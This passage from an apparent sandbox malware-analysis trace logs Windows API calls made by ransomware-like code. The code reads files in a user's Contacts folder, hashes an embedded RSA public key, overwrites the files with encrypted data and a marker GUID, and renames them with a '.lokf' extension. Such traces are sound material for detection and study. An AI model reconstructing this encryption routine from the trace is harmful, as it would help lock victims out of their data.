| out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242628 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216b00 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.330] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0x10b19, lpOverlapped=0x0) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.330] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.330] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.330] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.330] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.330] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.330] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.331] CloseHandle (hObject=0x5cc) returned 1 [0058.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.332] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.lokf")) returned 1 [0058.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.332] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.333] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0058.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0058.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0058.333] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0058.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.333] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1171) returned 1 [0058.334] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.336] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.336] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.344] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.344] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x493, lpOverlapped=0x0) returned 1 [0058.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.344] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32947b0 [0058.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.344] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.345] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.345] CryptHashData (hHash=0x327cb40, pbData=0x32947b0, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.345] CryptGetHashParam (in: hHash=0x327cb40, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3240c48 [0058.345] CryptGetHashParam (in: hHash=0x327cb40, dwParam=0x2, pbData=0x3240c48, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3240c48, pdwDataLen=0x9f4fa54) returned 1 [0058.345] GetLastError () returned 0x0 [0058.345] SetLastError (dwErrCode=0x0) [0058.345] GetLastError () returned 0x0 [0058.345] SetLastError (dwErrCode=0x0) [0058.345] GetLastError () returned 0x0 [0058.345] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.346] GetLastError () returned 0x0 [0058.346] SetLastError (dwErrCode=0x0) [0058.346] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.347] GetLastError () returned 0x0 [0058.347] SetLastError (dwErrCode=0x0) [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.348] CryptDestroyHash (hHash=0x327cb40) returned 1 [0058.348] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.348] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.348] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.348] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x490) returned 0x32947b0 [0058.348] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x3294c48 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216b00 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e728 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3294e40 [0058.348] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3294e40, Size=0x218) returned 0x3297a68 [0058.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297c88 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297c88 | out: hHeap=0x660000) returned 1 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbcc8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6ac68 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbce8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242628 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.349] GetCurrentThreadId () returned 0x9e0 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2540 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257390 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbce8 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.349] GetCurrentThreadId () returned 0x9e0 [0058.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3294e40 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3260e48 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3247810 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.351] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.351] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.351] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.351] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.351] CloseHandle (hObject=0x5cc) returned 1 [0058.352] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.lokf")) returned 1 [0058.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.352] VirtualFree (lpAddress=0x3700000, dwSize=0x0, 